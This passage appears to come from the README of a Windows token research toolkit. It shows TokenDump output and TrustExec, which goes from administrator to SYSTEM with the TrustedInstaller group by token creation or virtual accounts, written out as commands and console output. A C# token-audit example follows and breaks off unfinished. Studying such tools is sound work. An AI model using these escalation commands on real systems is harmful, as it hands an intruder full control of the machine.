    NT AUTHORITY\NTLM Authentication                              Mandatory, EnabledByDefault, Enabled
    Mandatory Label\Low Mandatory Level                           Integrity, IntegrityEnabled


    APPCONTAINER CAPABILITIES
    -------------------------

    Capability Name                                                                  Flags
    ================================================================================ =======
    NAMED CAPABILITIES\GlobalMediaControl                                            Enabled
    APPLICATION PACKAGE AUTHORITY\Software and hardware certificates or a smart card Enabled
    NAMED CAPABILITIES\RemoteSystem                                                  Enabled
    APPLICATION PACKAGE AUTHORITY\Your pictures library                              Enabled
    NAMED CAPABILITIES\ActivitySystem                                                Enabled
    NAMED CAPABILITIES\BluetoothDeviceSettings                                       Enabled
    NAMED CAPABILITIES\PackageQuery                                                  Enabled
    NAMED CAPABILITIES\CellularDeviceControl                                         Enabled
    NAMED CAPABILITIES\CellularDeviceIdentity                                        Enabled
    NAMED CAPABILITIES\NetworkDeviceSettings                                         Enabled
    NAMED CAPABILITIES\AppointmentsSystem                                            Enabled
    NAMED CAPABILITIES\EnterpriseCloudSSO                                            Enabled
    NAMED CAPABILITIES\ChatSystem                                                    Enabled
    NAMED CAPABILITIES\ContactsSystem                                                Enabled
    NAMED CAPABILITIES\EmailSystem                                                   Enabled
    NAMED CAPABILITIES\PhoneCallHistorySystem                                        Enabled
    NAMED CAPABILITIES\InputInjection                                                Enabled
    NAMED CAPABILITIES\UserDataAccountSetup                                          Enabled
    NAMED CAPABILITIES\UserWebAccounts                                               Enabled
    NAMED CAPABILITIES\ShellExperience                                               Enabled
    NAMED CAPABILITIES\CloudStore                                                    Enabled
    NAMED CAPABILITIES\CortanaSettings                                               Enabled
    NAMED CAPABILITIES\PackageContents                                               Enabled
    NAMED CAPABILITIES\TargetedContent                                               Enabled
    NAMED CAPABILITIES\UserAccountInformation                                        Enabled
    APPLICATION PACKAGE AUTHORITY\Your Internet connection                           Enabled
    NAMED CAPABILITIES\Location                                                      Enabled
    NAMED CAPABILITIES\VisualElementsSystem                                          Enabled
    NAMED CAPABILITIES\ActivityData                                                  Enabled
    NAMED CAPABILITIES\Bluetooth                                                     Enabled
    NAMED CAPABILITIES\Radios                                                        Enabled
    NAMED CAPABILITIES\WiFiControl                                                   Enabled
    NAMED CAPABILITIES\CellularData                                                  Enabled
    NAMED CAPABILITIES\WifiData                                                      Enabled
    NAMED CAPABILITIES\BluetoothAdapter                                              Enabled
    NAMED CAPABILITIES\BluetoothSync                                                 Enabled
    PACKAGE CAPABILITY\microsoft.windows.shellexperiencehost_cw5n1h2txyewy           Enabled
    NAMED CAPABILITIES\AccessoryManager                                              Enabled
    NAMED CAPABILITIES\AccessoryManager                                              Enabled
    NAMED CAPABILITIES\Contacts                                                      Enabled
    NAMED CAPABILITIES\Email                                                         Enabled
    NAMED CAPABILITIES\PhoneCallHistory                                              Enabled
    NAMED CAPABILITIES\UserAccountInformation                                        Enabled
    NAMED CAPABILITIES\ID_CAP_LOCATION                                               Enabled
    NAMED CAPABILITIES\Bluetooth                                                     Enabled
    NAMED CAPABILITIES\Bluetooth                                                     Enabled
    NAMED CAPABILITIES\Bluetooth                                                     Enabled
    NAMED CAPABILITIES\Bluetooth                                                     Enabled
    NAMED CAPABILITIES\Bluetooth                                                     Enabled
    NAMED CAPABILITIES\Radios                                                        Enabled
    NAMED CAPABILITIES\WiFiControl                                                   Enabled


    DACL INFORMATION
    ----------------

    Account Name                                        Access                      Flags Type
    =================================================== =========================== ===== =============
    X64DEV\user                                         GenericAll                  None  AccessAllowed
    NT AUTHORITY\SYSTEM                                 GenericAll                  None  AccessAllowed
    NT AUTHORITY\LogonSessionId_0_124092                GenericExecute, GenericRead None  AccessAllowed
    microsoft.windows.shellexperiencehost_cw5n1h2txyewy GenericAll                  None  AccessAllowed



[Linked Token Information for ShellExperienceHost.exe (PID: 5520)]

Token User          : X64DEV\user (SID: S-1-5-21-1272994938-2904448873-3522237253-1001)
Token Owner         : BUILTIN\Administrators (SID: S-1-5-32-544)
Primary Group       : X64DEV\None (SID: S-1-5-21-1272994938-2904448873-3522237253-513)
Token Type          : Impersonation
Impersonation Level : Identification
Token ID            : 0x0000000000E9BC5F
Authentication ID   : 0x000000000001E798
Original ID         : 0x00000000000003E7
Modified ID         : 0x000000000001E808
Integrity Level     : High
Session ID          : 1
Elevation Type      : Full
Elevated            : True
Restricted          : False
AppContainer        : False
Token Source        : User32
Token Source ID     : 0x000000000001E500

    PRIVILEGES INFORMATION
    ----------------------

    Privilege Name                            State
    ========================================= =========================
    SeIncreaseQuotaPrivilege                  Disabled
    SeSecurityPrivilege                       Disabled
    SeTakeOwnershipPrivilege                  Disabled
    SeLoadDriverPrivilege                     Disabled
    SeSystemProfilePrivilege                  Disabled
    SeSystemtimePrivilege                     Disabled
    SeProfileSingleProcessPrivilege           Disabled
    SeIncreaseBasePriorityPrivilege           Disabled
    SeCreatePagefilePrivilege                 Disabled
    SeBackupPrivilege                         Disabled
    SeRestorePrivilege                        Disabled
    SeShutdownPrivilege                       Disabled
    SeDebugPrivilege                          Disabled
    SeSystemEnvironmentPrivilege              Disabled
    SeChangeNotifyPrivilege                   EnabledByDefault, Enabled
    SeRemoteShutdownPrivilege                 Disabled
    SeUndockPrivilege                         Disabled
    SeManageVolumePrivilege                   Disabled
    SeImpersonatePrivilege                    EnabledByDefault, Enabled
    SeCreateGlobalPrivilege                   EnabledByDefault, Enabled
    SeIncreaseWorkingSetPrivilege             Disabled
    SeTimeZonePrivilege                       Disabled
    SeCreateSymbolicLinkPrivilege             Disabled
    SeDelegateSessionUserImpersonatePrivilege Disabled


    GROUP INFORMATION
    -----------------

    Group Name                                                    Attributes
    ============================================================= =============================================
    X64DEV\None                                                   Mandatory, EnabledByDefault, Enabled
    Everyone                                                      Mandatory, EnabledByDefault, Enabled
    NT AUTHORITY\Local account and member of Administrators group Mandatory, EnabledByDefault, Enabled
    BUILTIN\Administrators                                        Mandatory, EnabledByDefault, Enabled, Owner
    BUILTIN\Users                                                 Mandatory, EnabledByDefault, Enabled
    NT AUTHORITY\INTERACTIVE                                      Mandatory, EnabledByDefault, Enabled
    CONSOLE LOGON                                                 Mandatory, EnabledByDefault, Enabled
    NT AUTHORITY\Authenticated Users                              Mandatory, EnabledByDefault, Enabled
    NT AUTHORITY\This Organization                                Mandatory, EnabledByDefault, Enabled
    NT AUTHORITY\Local account                                    Mandatory, EnabledByDefault, Enabled
    NT AUTHORITY\LogonSessionId_0_124092                          Mandatory, EnabledByDefault, Enabled, LogonId
    LOCAL                                                         Mandatory, EnabledByDefault, Enabled
    NT AUTHORITY\NTLM Authentication                              Mandatory, EnabledByDefault, Enabled
    Mandatory Label\High Mandatory Level                          Integrity, IntegrityEnabled


    DACL INFORMATION
    ----------------

    Account Name                         Access                      Flags Type
    ==================================== =========================== ===== =============
    BUILTIN\Administrators               GenericAll                  None  AccessAllowed
    NT AUTHORITY\SYSTEM                  GenericAll                  None  AccessAllowed
    NT AUTHORITY\LogonSessionId_0_124092 GenericExecute, GenericRead None  AccessAllowed


[*] Done.

If you set a handle value in a specific process with the -v option and the PID with the -p option, together with the -s flag, this tool gets verbose information for that handle as follows:

C:\Dev>.\TokenDump.exe -s -p 8828 -v 0x428 -d

[>] Trying to enable SeDebugPrivilege.
[+] SeDebugPrivilege is enabled successfully.
[>] Trying to dump token handle information.

[Token Information for Handle 0x428 of svchost.exe (PID: 8828)]

Token User          : NT AUTHORITY\LOCAL SERVICE (SID: S-1-5-19)
Token Owner         : NT AUTHORITY\LOCAL SERVICE (SID: S-1-5-19)
Primary Group       : NT AUTHORITY\LOCAL SERVICE (SID: S-1-5-19)
Token Type          : Impersonation
Impersonation Level : Impersonation
Token ID            : 0x000000000119F79B
Authentication ID   : 0x00000000000003E5
Original ID         : 0x00000000000003E7
Modified ID         : 0x000000000119F79D
Integrity Level     : System
Session ID          : 0
Elevation Type      : Default
Elevated            : True
Restricted          : False
AppContainer        : False
Has Linked Token    : False
Token Source        : Advapi
Token Source ID     : 0x000000000006C1EC

    PRIVILEGES INFORMATION
    ----------------------

    Privilege Name          State
    ======================= =========================
    SeChangeNotifyPrivilege EnabledByDefault, Enabled
    SeImpersonatePrivilege  EnabledByDefault, Enabled


    GROUP INFORMATION
    -----------------

    Group Name                             Attributes
    ====================================== ====================================================
    Mandatory Label\System Mandatory Level Integrity, IntegrityEnabled
    Everyone                               Mandatory, EnabledByDefault, Enabled
    BUILTIN\Users                          Mandatory, EnabledByDefault, Enabled
    NT AUTHORITY\SERVICE                   Mandatory, EnabledByDefault, Enabled
    CONSOLE LOGON                          Mandatory, EnabledByDefault, Enabled
    NT AUTHORITY\Authenticated Users       Mandatory, EnabledByDefault, Enabled
    NT AUTHORITY\This Organization         Mandatory, EnabledByDefault, Enabled
    NT SERVICE\LicenseManager              EnabledByDefault, Enabled, Owner
    NT AUTHORITY\LogonSessionId_0_442859   Mandatory, EnabledByDefault, Enabled, Owner, LogonId
    LOCAL                                  Mandatory, EnabledByDefault, Enabled


    DACL INFORMATION
    ----------------

    Account Name              Access      Flags Type
    ========================= =========== ===== =============
    NT AUTHORITY\SYSTEM       GenericAll  None  AccessAllowed
    OWNER RIGHTS              ReadControl None  AccessAllowed
    NT SERVICE\LicenseManager GenericAll  None  AccessAllowed


[*] Done.

To investigate an impersonation token applied to a thread, set the thread ID with the -t option as follows (the -T flag enumerates thread tokens first):

C:\Dev>.\TokenDump.exe -e -T -d

[>] Trying to enable SeDebugPrivilege.
[+] SeDebugPrivilege is enabled successfully.
[>] Trying to enumerate thread tokens.

 PID  TID Process Name      Token User          Integrity Impersonation Level
==== ==== ================= =================== ========= ===================
2052 6768 svchost.exe       NT AUTHORITY\SYSTEM System    Impersonation
3416 2068 svchost.exe       NT AUTHORITY\SYSTEM System    Impersonation
3416 4168 svchost.exe       NT AUTHORITY\SYSTEM System    Impersonation
2864 8696 TokenStealing.exe NT AUTHORITY\SYSTEM System    Impersonation
4936 4848 TiWorker.exe      NT AUTHORITY\SYSTEM System    Impersonation

[+] Got 5 handle(s).
[*] Found 1 account(s).
    [*] NT AUTHORITY\SYSTEM
[*] Done.


C:\Dev>.\TokenDump.exe -s -p 4936 -t 4848 -d

[>] Trying to enable SeDebugPrivilege.
[+] SeDebugPrivilege is enabled successfully.
[>] Trying to dump thread token information.

[Token Information for TiWorker.exe (PID: 4936, TID: 4848)]

Token User          : NT AUTHORITY\SYSTEM (SID: S-1-5-18)
Token Owner         : NT AUTHORITY\SYSTEM (SID: S-1-5-18)
Primary Group       : NT AUTHORITY\SYSTEM (SID: S-1-5-18)
Token Type          : Impersonation
Impersonation Level : Impersonation
Token ID            : 0x00000000010C7342
Authentication ID   : 0x00000000000003E7
Original ID         : 0x00000000000003E7
Modified ID         : 0x0000000000F9368D
Integrity Level     : System
Session ID          : 0
Elevation Type      : Default
Elevated            : True
Restricted          : False
AppContainer        : False
Has Linked Token    : False
Token Source        : N/A
Token Source ID     : N/A

    PRIVILEGES INFORMATION
    ----------------------

    Privilege Name                            State
    ========================================= =========================
    SeAssignPrimaryTokenPrivilege             Disabled
    SeLockMemoryPrivilege                     EnabledByDefault, Enabled
    SeIncreaseQuotaPrivilege                  Disabled
    SeTcbPrivilege                            EnabledByDefault, Enabled
    SeSecurityPrivilege                       Enabled
    SeTakeOwnershipPrivilege                  Disabled
    SeLoadDriverPrivilege                     Disabled
    SeSystemProfilePrivilege                  EnabledByDefault, Enabled
    SeSystemtimePrivilege                     Disabled
    SeProfileSingleProcessPrivilege           EnabledByDefault, Enabled
    SeIncreaseBasePriorityPrivilege           EnabledByDefault, Enabled
    SeCreatePagefilePrivilege                 EnabledByDefault, Enabled
    SeCreatePermanentPrivilege                EnabledByDefault, Enabled
    SeBackupPrivilege                         Enabled
    SeRestorePrivilege                        Enabled
    SeShutdownPrivilege                       Disabled
    SeDebugPrivilege                          EnabledByDefault, Enabled
    SeAuditPrivilege                          EnabledByDefault, Enabled
    SeSystemEnvironmentPrivilege              Disabled
    SeChangeNotifyPrivilege                   EnabledByDefault, Enabled
    SeUndockPrivilege                         Disabled
    SeManageVolumePrivilege                   Disabled
    SeImpersonatePrivilege                    EnabledByDefault, Enabled
    SeCreateGlobalPrivilege                   EnabledByDefault, Enabled
    SeIncreaseWorkingSetPrivilege             EnabledByDefault, Enabled
    SeTimeZonePrivilege                       EnabledByDefault, Enabled
    SeCreateSymbolicLinkPrivilege             EnabledByDefault, Enabled
    SeDelegateSessionUserImpersonatePrivilege EnabledByDefault, Enabled


    GROUP INFORMATION
    -----------------

    Group Name                             Attributes
    ====================================== ====================================================
    Mandatory Label\System Mandatory Level Integrity, IntegrityEnabled
    Everyone                               Mandatory, EnabledByDefault, Enabled
    BUILTIN\Users                          Mandatory, EnabledByDefault, Enabled
    NT AUTHORITY\SERVICE                   Mandatory, EnabledByDefault, Enabled
    CONSOLE LOGON                          Mandatory, EnabledByDefault, Enabled
    NT AUTHORITY\Authenticated Users       Mandatory, EnabledByDefault, Enabled
    NT AUTHORITY\This Organization         Mandatory, EnabledByDefault, Enabled
    NT SERVICE\TrustedInstaller            EnabledByDefault, Enabled, Owner
    NT AUTHORITY\LogonSessionId_0_14288153 Mandatory, EnabledByDefault, Enabled, Owner, LogonId
    LOCAL                                  Mandatory, EnabledByDefault, Enabled
    BUILTIN\Administrators                 EnabledByDefault, Enabled, Owner


    DACL INFORMATION
    ----------------

    Account Name                Access      Flags Type
    =========================== =========== ===== =============
    NT AUTHORITY\SYSTEM         GenericAll  None  AccessAllowed
    OWNER RIGHTS                ReadControl None  AccessAllowed
    NT SERVICE\TrustedInstaller GenericAll  None  AccessAllowed


[*] Done.

TrustExec

Back to Top

Project

This tool executes a process as the NT SERVICE\TrustedInstaller group account. The original PoC is Grzegorz Tworek's TrustedInstallerCmd2.c; I ported it to C# and rebuilt it as a tool. Most operations require administrative privileges (SeDebugPrivilege, SeImpersonatePrivilege and High Mandatory Level):

C:\dev>TrustExec.exe

TrustExec - Tool to investigate TrustedInstaller capability.

Usage: TrustExec.exe [Options]

        -h, --help   : Displays this help message.
        -m, --module : Specifies module name.

Available Modules:

    + exec - Run process as "NT SERVICE\TrustedInstaller".
    + sid  - Add or remove virtual account's SID.

[*] To see help for each modules, specify "-m <Module> -h" as arguments.

exec Module

This module executes a process as the TrustedInstaller group account:

C:\dev>TrustExec.exe -m exec -h

TrustExec - Help for "exec" command.

Usage: TrustExec.exe -m exec [Options]

        -h, --help      : Displays this help message.
        -s, --shell     : Flag for interactive shell.
        -f, --full      : Flag to enable all available privileges.
        -t, --technique : Specifies technique ID. Default ID is 0.
        -c, --command   : Specifies command to execute.
        -d, --domain    : Specifies domain name to add. Default value is "DefaultDomain".
        -u, --username  : Specifies username to add. Default value is "DefaultUser".
        -i, --id        : Specifies RID for virtual domain. Default value is "110".
        -e, --extra     : Specifies extra group SID(s) to add.

Available Technique IDs:

        + 0 - Leverages SeCreateTokenPrivilege. Uses only --shell flag, --full flag and --command option.
        + 1 - Leverages virtual logon. This technique creates virtual domain and account as a side effect.

For this module, two techniques are implemented. You can specify the technique with the -t option. If you set 0 or don't set a value for the -t option, TrustExec will try to create a TrustedInstaller process with the create token technique. To get an interactive shell, set the -s flag.

C:\dev>TrustExec.exe -m exec -s

[>] Trying to get SYSTEM.
[+] SeDebugPrivilege is enabled successfully.
[>] Trying to impersonate as smss.exe.
[+] SeCreateTokenPrivilege is enabled successfully.
[+] SeAssignPrimaryTokenPrivilege is enabled successfully.
[>] Trying to impersonate thread token.
    |-> Current Thread ID : 3360
[+] Impersonation is successful.
[>] Trying to create an elevated primary token.
[+] An elevated primary token is created successfully.
[>] Trying to create a token assigned process.

Microsoft Windows [Version 10.0.19043.1526]
(c) Microsoft Corporation. All rights reserved.

C:\dev>whoami /user

USER INFORMATION
----------------

User Name           SID
=================== ========
nt authority\system S-1-5-18

C:\dev>whoami /groups | findstr /i trusted
NT SERVICE\TrustedInstaller            Well-known group S-1-5-80-956008885-3418522649-1831038044-1853292631-2271478464 Enabled by default, Enabled group, Group owner

C:\dev>whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= =======
SeAssignPrimaryTokenPrivilege Replace a process level token             Enabled
SeTcbPrivilege                Act as part of the operating system       Enabled
SeDebugPrivilege              Debug programs                            Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled

If you want to add an extra group account to the token of the new process, use the -e option as follows:

C:\dev>TrustExec.exe -m exec -s -e S-1-5-20

[>] Parsing group SID(s).
[+] "NT AUTHORITY\NETWORK SERVICE" is added as an extra group.
    |-> SID  : S-1-5-20
    |-> Type : SidTypeWellKnownGroup
[>] Trying to get SYSTEM.
[>] Trying to impersonate as smss.exe.
[+] SeCreateTokenPrivilege is enabled successfully.
[+] SeAssignPrimaryTokenPrivilege is enabled successfully.
[>] Trying to impersonate thread token.
    |-> Current Thread ID : 4392
[+] Impersonation is successful.
[>] Trying to create an elevated primary token.
[+] An elevated primary token is created successfully.
[>] Trying to create a token assigned process.

Microsoft Windows [Version 10.0.22000.318]
(c) Microsoft Corporation. All rights reserved.

C:\dev>whoami /groups

GROUP INFORMATION
-----------------

Group Name                             Type             SID                                                            Attributes
====================================== ================ ============================================================== ==================================================
BUILTIN\Administrators                 Alias            S-1-5-32-544                                                   Enabled by default, Enabled group, Group owner
Everyone                               Well-known group S-1-1-0                                                        Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users       Well-known group S-1-5-11                                                       Mandatory group, Enabled by default, Enabled group
Mandatory Label\System Mandatory Level Label            S-1-16-16384

NT SERVICE\TrustedInstaller            Well-known group S-1-5-80-956008885-3418522649-1831038044-1853292631-2271478464 Enabled by default, Enabled group, Group owner
NT AUTHORITY\NETWORK SERVICE           Well-known group S-1-5-20                                                       Mandatory group, Enabled by default, Enabled group

To add multiple groups, specify the SIDs as a comma-separated value:

C:\dev>TrustExec.exe -m exec -s -e S-1-5-20,S-1-5-32-551

[>] Parsing group SID(s).
[+] "NT AUTHORITY\NETWORK SERVICE" is added as an extra group.
    |-> SID  : S-1-5-20
    |-> Type : SidTypeWellKnownGroup
[+] "BUILTIN\Backup Operators" is added as an extra group.
    |-> SID  : S-1-5-32-551
    |-> Type : SidTypeAlias
[>] Trying to get SYSTEM.
[>] Trying to impersonate as smss.exe.
[+] SeCreateTokenPrivilege is enabled successfully.
[+] SeAssignPrimaryTokenPrivilege is enabled successfully.
[>] Trying to impersonate thread token.
    |-> Current Thread ID : 3104
[+] Impersonation is successful.
[>] Trying to create an elevated primary token.
[+] An elevated primary token is created successfully.
[>] Trying to create a token assigned process.

Microsoft Windows [Version 10.0.22000.318]
(c) Microsoft Corporation. All rights reserved.

C:\dev>whoami /groups

GROUP INFORMATION
-----------------

Group Name                             Type             SID                                                            Attributes
====================================== ================ ============================================================== ==================================================
BUILTIN\Administrators                 Alias            S-1-5-32-544                                                   Enabled by default, Enabled group, Group owner
Everyone                               Well-known group S-1-1-0                                                        Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users       Well-known group S-1-5-11                                                       Mandatory group, Enabled by default, Enabled group
Mandatory Label\System Mandatory Level Label            S-1-16-16384

NT SERVICE\TrustedInstaller            Well-known group S-1-5-80-956008885-3418522649-1831038044-1853292631-2271478464 Enabled by default, Enabled group, Group owner
NT AUTHORITY\NETWORK SERVICE           Well-known group S-1-5-20                                                       Mandatory group, Enabled by default, Enabled group
BUILTIN\Backup Operators               Alias            S-1-5-32-551                                                   Mandatory group, Enabled by default, Enabled group

If you set 1 for the -t option, TrustExec will try to create a TrustedInstaller process with the virtual account technique. As a side effect, this technique creates a virtual account to impersonate the TrustedInstaller group account. If you don't specify a domain name (-d option), username (-u option) and RID (-i option), this module creates the virtual account DefaultDomain\DefaultUser. The default SID for the domain is S-1-5-110 and for the user is S-1-5-110-110:

C:\dev>TrustExec.exe -m exec -s -t 1

[>] Trying to get SYSTEM.
[+] SeDebugPrivilege is enabled successfully.
[>] Trying to impersonate as smss.exe.
[+] SeAssignPrimaryTokenPrivilege is enabled successfully.
[+] SeIncreaseQuotaPrivilege is enabled successfully.
[>] Trying to impersonate thread token.
    |-> Current Thread ID : 2616
[+] Impersonation is successful.
[>] Trying to generate token group information.
[>] Trying to add virtual domain and user.
    |-> Domain   : DefaultDomain (SID : S-1-5-110)
    |-> Username : DefaultUser (SID : S-1-5-110-110)
[+] Added virtual domain and user.
[>] Trying to logon as DefaultDomain\DefaultUser.
[>] Trying to create a token assigned process.

Microsoft Windows [Version 10.0.18362.30]
(c) 2019 Microsoft Corporation. All rights reserved.

C:\dev>whoami /user

USER INFORMATION
----------------

User Name                 SID
========================= =============
defaultdomain\defaultuser S-1-5-110-110

C:\dev>whoami /groups | findstr /i trusted
NT SERVICE\TrustedInstaller            Well-known group S-1-5-80-956008885-3418522649-1831038044-1853292631-2271478464 Enabled by default, Enabled group, Group owner

C:\dev>exit

[>] Exit.
[!] Added virtual domain and user are not removed automatically.
    |-> To remove added virtual user SID   : TrustExec.exe -m sid -r -d DefaultDomain -u DefaultUser
    |-> To remove added virtual domain SID : TrustExec.exe -m sid -r -d DefaultDomain

To change the domain name and username, use the -d option and the -u option. To change the domain RID, use the -i option as follows:

C:\dev>TrustExec.exe -m exec -s -d VirtualDomain -u VirtualAdmin -i 92 -t 1

[>] Trying to get SYSTEM.
[+] SeDebugPrivilege is enabled successfully.
[>] Trying to impersonate as smss.exe.
[+] SeAssignPrimaryTokenPrivilege is enabled successfully.
[+] SeIncreaseQuotaPrivilege is enabled successfully.
[>] Trying to impersonate thread token.
    |-> Current Thread ID : 3612
[+] Impersonation is successful.
[>] Trying to generate token group information.
[>] Trying to add virtual domain and user.
    |-> Domain   : VirtualDomain (SID : S-1-5-92)
    |-> Username : VirtualAdmin (SID : S-1-5-92-110)
[+] Added virtual domain and user.
[>] Trying to logon as VirtualDomain\VirtualAdmin.
[>] Trying to create a token assigned process.

Microsoft Windows [Version 10.0.18362.30]
(c) 2019 Microsoft Corporation. All rights reserved.

C:\dev>whoami /user

USER INFORMATION
----------------

User Name                  SID
========================== ============
virtualdomain\virtualadmin S-1-5-92-110

If you want to execute a single command, use the -c option without the -s flag as follows:

C:\dev>TrustExec.exe -m exec -c "whoami /user & whoami /priv"

[>] Trying to get SYSTEM.
[+] SeDebugPrivilege is enabled successfully.
[>] Trying to impersonate as smss.exe.
[+] SeCreateTokenPrivilege is enabled successfully.
[+] SeAssignPrimaryTokenPrivilege is enabled successfully.
[>] Trying to impersonate thread token.
    |-> Current Thread ID : 1464
[+] Impersonation is successful.
[>] Trying to create an elevated primary token.
[+] An elevated primary token is created successfully.
[>] Trying to create a token assigned process.


USER INFORMATION
----------------

User Name           SID
=================== ========
nt authority\system S-1-5-18

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= =======
SeAssignPrimaryTokenPrivilege Replace a process level token             Enabled
SeTcbPrivilege                Act as part of the operating system       Enabled
SeDebugPrivilege              Debug programs                            Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled

[>] Exit.

If you want to enable all available privileges, set the -f flag as follows:

C:\dev>TrustExec.exe -m exec -c "whoami /priv" -f

[>] Trying to get SYSTEM.
[+] SeDebugPrivilege is enabled successfully.
[>] Trying to impersonate as smss.exe.
[+] SeCreateTokenPrivilege is enabled successfully.
[+] SeAssignPrimaryTokenPrivilege is enabled successfully.
[>] Trying to impersonate thread token.
    |-> Current Thread ID : 2526
[+] Impersonation is successful.
[>] Trying to create an elevated primary token.
[+] An elevated primary token is created successfully.
[>] Trying to create a token assigned process.


PRIVILEGES INFORMATION
----------------------

Privilege Name                            Description                                                        State
========================================= ================================================================== =======
SeCreateTokenPrivilege                    Create a token object                                              Enabled
SeAssignPrimaryTokenPrivilege             Replace a process level token                                      Enabled
SeLockMemoryPrivilege                     Lock pages in memory                                               Enabled
SeIncreaseQuotaPrivilege                  Adjust memory quotas for a process                                 Enabled
SeMachineAccountPrivilege                 Add workstations to domain                                         Enabled
SeTcbPrivilege                            Act as part of the operating system                                Enabled
SeSecurityPrivilege                       Manage auditing and security log                                   Enabled
SeTakeOwnershipPrivilege                  Take ownership of files or other objects                           Enabled
SeLoadDriverPrivilege                     Load and unload device drivers                                     Enabled
SeSystemProfilePrivilege                  Profile system performance                                         Enabled
SeSystemtimePrivilege                     Change the system time                                             Enabled
SeProfileSingleProcessPrivilege           Profile single process                                             Enabled
SeIncreaseBasePriorityPrivilege           Increase scheduling priority                                       Enabled
SeCreatePagefilePrivilege                 Create a pagefile                                                  Enabled
SeCreatePermanentPrivilege                Create permanent shared objects                                    Enabled
SeBackupPrivilege                         Back up files and directories                                      Enabled
SeRestorePrivilege                        Restore files and directories                                      Enabled
SeShutdownPrivilege                       Shut down the system                                               Enabled
SeDebugPrivilege                          Debug programs                                                     Enabled
SeAuditPrivilege                          Generate security audits                                           Enabled
SeSystemEnvironmentPrivilege              Modify firmware environment values                                 Enabled
SeChangeNotifyPrivilege                   Bypass traverse checking                                           Enabled
SeRemoteShutdownPrivilege                 Force shutdown from a remote system                                Enabled
SeUndockPrivilege                         Remove computer from docking station                               Enabled
SeSyncAgentPrivilege                      Synchronize directory service data                                 Enabled
SeEnableDelegationPrivilege               Enable computer and user accounts to be trusted for delegation     Enabled
SeManageVolumePrivilege                   Perform volume maintenance tasks                                   Enabled
SeImpersonatePrivilege                    Impersonate a client after authentication                          Enabled
SeCreateGlobalPrivilege                   Create global objects                                              Enabled
SeTrustedCredManAccessPrivilege           Access Credential Manager as a trusted caller                      Enabled
SeRelabelPrivilege                        Modify an object label                                             Enabled
SeIncreaseWorkingSetPrivilege             Increase a process working set                                     Enabled
SeTimeZonePrivilege                       Change the time zone                                               Enabled
SeCreateSymbolicLinkPrivilege             Create symbolic links                                              Enabled
SeDelegateSessionUserImpersonatePrivilege Obtain an impersonation token for another user in the same session Enabled

[>] Exit.

The domain and username added by the virtual account technique are not removed automatically. If you want to remove them, run the sid module as shown at the end of the -t 1 output above.
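The token fields TokenDump prints above (the privilege State column, the group SIDs) and the TrustedInstaller group SID that TrustExec adds can both be read back from any process with GetTokenInformation. The following is an added example, not PrivFu's code: it assumes a C# console project on Windows, takes a PID on the command line (defaulting to itself), prints the privilege table in TokenDump's State format and flags a token that carries the TrustedInstaller group SID from the whoami output above, which on an image other than TrustedInstaller.exe is worth a closer look.

```csharp
using System;
using System.Collections.Generic;
using System.ComponentModel;
using System.Runtime.InteropServices;
using System.Security.Principal;
using System.Text;

// Added example (not part of PrivFu): reads a process token with GetTokenInformation, prints
// the privilege table in TokenDump's State format and flags the TrustedInstaller group SID.
static class TokenAudit
{
    const uint PROCESS_QUERY_LIMITED_INFORMATION = 0x1000;   // enough for OpenProcessToken
    const uint TOKEN_QUERY = 0x0008;
    const uint SE_PRIVILEGE_ENABLED_BY_DEFAULT = 0x1;
    const uint SE_PRIVILEGE_ENABLED = 0x2;
    const int TokenGroups = 2, TokenPrivileges = 3;          // TOKEN_INFORMATION_CLASS
    // Group SID of NT SERVICE\TrustedInstaller, as printed by whoami /groups above
    const string TrustedInstallerSid = "S-1-5-80-956008885-3418522649-1831038044-1853292631-2271478464";

    [StructLayout(LayoutKind.Sequential)] struct LUID { public uint LowPart; public int HighPart; }
    [StructLayout(LayoutKind.Sequential)] struct LUID_AND_ATTRIBUTES { public LUID Luid; public uint Attributes; }
    [StructLayout(LayoutKind.Sequential)] struct SID_AND_ATTRIBUTES { public IntPtr Sid; public uint Attributes; }

    [DllImport("kernel32.dll", SetLastError = true)] static extern IntPtr OpenProcess(uint access, bool inherit, int pid);
    [DllImport("kernel32.dll", SetLastError = true)] static extern bool CloseHandle(IntPtr handle);
    [DllImport("advapi32.dll", SetLastError = true)] static extern bool OpenProcessToken(IntPtr process, uint access, out IntPtr token);
    [DllImport("advapi32.dll", SetLastError = true)] static extern bool GetTokenInformation(IntPtr token, int infoClass, IntPtr buffer, int length, out int needed);
    [DllImport("advapi32.dll", SetLastError = true, CharSet = CharSet.Unicode)] static extern bool LookupPrivilegeName(string system, ref LUID luid, StringBuilder name, ref int cchName);

    // Two-call pattern: probe the required size, then fetch. Caller frees the buffer.
    static IntPtr QueryToken(IntPtr token, int infoClass)
    {
        int needed;
        GetTokenInformation(token, infoClass, IntPtr.Zero, 0, out needed);
        IntPtr buffer = Marshal.AllocHGlobal(needed);
        if (!GetTokenInformation(token, infoClass, buffer, needed, out needed)) { Marshal.FreeHGlobal(buffer); throw new Win32Exception(Marshal.GetLastWin32Error()); }
        return buffer;
    }

    // The State column: SE_PRIVILEGE_* bits of LUID_AND_ATTRIBUTES, "Disabled" when none is set
    public static string StateString(uint attributes)
    {
        var parts = new List<string>();
        if ((attributes & SE_PRIVILEGE_ENABLED_BY_DEFAULT) != 0) parts.Add("EnabledByDefault");
        if ((attributes & SE_PRIVILEGE_ENABLED) != 0) parts.Add("Enabled");
        return parts.Count == 0 ? "Disabled" : string.Join(", ", parts);
    }

    static string PrivilegeName(LUID luid)
    {
        var name = new StringBuilder(64); int cch = 64;
        return LookupPrivilegeName(null, ref luid, name, ref cch) ? name.ToString() : "Unknown";
    }

    // TOKEN_PRIVILEGES: DWORD PrivilegeCount followed directly by LUID_AND_ATTRIBUTES[]
    public static Dictionary<string, string> Privileges(IntPtr token)
    {
        var table = new Dictionary<string, string>();
        IntPtr buffer = QueryToken(token, TokenPrivileges);
        int count = Marshal.ReadInt32(buffer), size = Marshal.SizeOf(typeof(LUID_AND_ATTRIBUTES));
        for (int i = 0; i < count; i++)
        {
            var entry = (LUID_AND_ATTRIBUTES)Marshal.PtrToStructure(buffer + 4 + i * size, typeof(LUID_AND_ATTRIBUTES));
            table[PrivilegeName(entry.Luid)] = StateString(entry.Attributes);
        }
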